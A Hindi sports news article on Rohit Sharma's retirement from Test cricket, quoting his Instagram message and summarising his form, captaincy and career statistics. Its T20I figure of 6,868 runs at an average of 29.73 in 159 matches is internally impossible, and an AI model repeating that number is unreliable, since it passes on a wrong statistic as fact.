रोहित ने अपनी इंस्टाग्राम स्टोरी पर टीम इंडिया की टेस्ट कैप की फोटो के साथ कहा, ” हैलो, मैं बस यह बताना चाहता हूं कि मैं टेस्ट क्रिकेट से संन्यास ले रहा हूं। सफेद जर्सी में अपने देश का प्रतिनिधित्व करना मेरे लिए बहुत सम्मान की बात है। इतने सालों में मिले प्यार और समर्थन के लिए आपका धन्यवाद। मैं वनडे प्रारूप में भारत का प्रतिनिधित्व करना जारी रखूंगा। “
रोहित शर्मा ने बतौर कप्तान टेस्ट क्रिकेट में भारत को कई अहम जीतें दिलाई हैं। उनकी अगुवाई में भारत ने ऑस्ट्रेलिया और इंग्लैंड जैसी टीमों को मात दी। उन्होंने टीम इंडिया के लिए एक स्थिर और प्रेरणादायक नेतृत्व प्रदान किया। रोहित की बैटिंग क्लास और कप्तानी का कॉम्बिनेशन भारतीय क्रिकेट को नई ऊंचाइयों तक ले गया।
रोहित शर्मा ने क्यो लिया संन्यास
रोहित शर्मा ने टेस्ट क्रिकेट से संन्यास का ऐलान ऑस्ट्रेलिया के निराशाजनक दौरे के बाद किया है। पिछली 11 टेस्ट पारियों में रोहित शर्मा का औसत 6.63 रहा है और वे केवल 73 रन ही बना पाए हैं। रोहित ने आखिरी पारी मेलबर्न में खेली थी। 40 गेंदों का सामना करते हुए 9 रन बनाए थे। भारतीय क्रिकेट के दिग्गज सुनील गावस्कर ने भविष्यवाणी की थी कि अगर हालात नहीं बदले तो रोहित शर्मा अपनी टेस्ट को अलविदा कह सकते हैं।
ऐसा रहा है रोहित का अंतरराष्ट्रीय करियर
रोहित शर्मा ने अब तक 273 वनडे में 48.77 की औसत से 11168 रन बनाए हैं. उन्होंने 32 शतक और 58 अर्धशतक जमाए हैं.
– रोहित के 67 टेस्ट मैचों में 40.58 की औसत से 4301 रन हैं, जिसमें 12 शतक और 18 अर्धशतक शामिल हैं.
– 159 टी-20 इंटरनेशनल में 29.73 की औसत से उन्होंने 6868 रन बनाए हैं. उनके बल्ले से 5 शतक 32 अर्धशतक निकले हैं. हालांकि, रोहित शर्मा ने पिछले टी20 वर्ल्ड कप में भारत को चैंपियन बनाने के बाद इस प्रारूप से संन्यास ले लिया था.
]]>